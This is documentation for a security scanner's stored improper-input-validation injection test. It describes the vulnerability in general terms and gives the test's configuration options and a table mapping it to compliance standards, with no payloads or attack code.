Security Test: Stored Improper Input Validation Injection¶
Description¶
Default Severity:
This vulnerability happens when an application does not carefully check or clean user input before saving it in a database, letting malicious code sneak in. The problem starts when attackers insert harmful code into the system, which later executes when other users access that stored data. This can allow attackers to perform actions like stealing sensitive information or hijacking user sessions. Often developers overlook thorough input validation or rely too heavily on client-side checks, which isn't enough to keep the data safe. If left unaddressed, this issue can compromise user data, undermine trust, and even open the door to more severe attacks in your application.
Reference:
Configuration¶
Identifier:
injection/improper_input_stored
Examples¶
All configuration available:
checks:
injection/improper_input_stored:
skip: false # default
options:
skip_objects: # cf. Options below
Options¶
Options can be set in the options key of the Security Test Configuration.
| Property | Type | Default | Description |
|---|---|---|---|
skip_objects | List[string] | List of object that are to be skipped by the security test. |
Compliance and Standards¶
| Standard | Value |
|---|---|
| OWASP API Top 10 | API10:2023 |
| OWASP LLM Top 10 | LLM02:2023 |
| PCI DSS | 6.5.7 |
| GDPR | Article-32 |
| SOC2 | CC1 |
| PSD2 | Article-95 |
| ISO 27001 | A.14.2 |
| NIST | SP800-53 |
| FedRAMP | AC-4 |
| CWE | 116 |
| CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C |
| CVSS Score | 7.2 |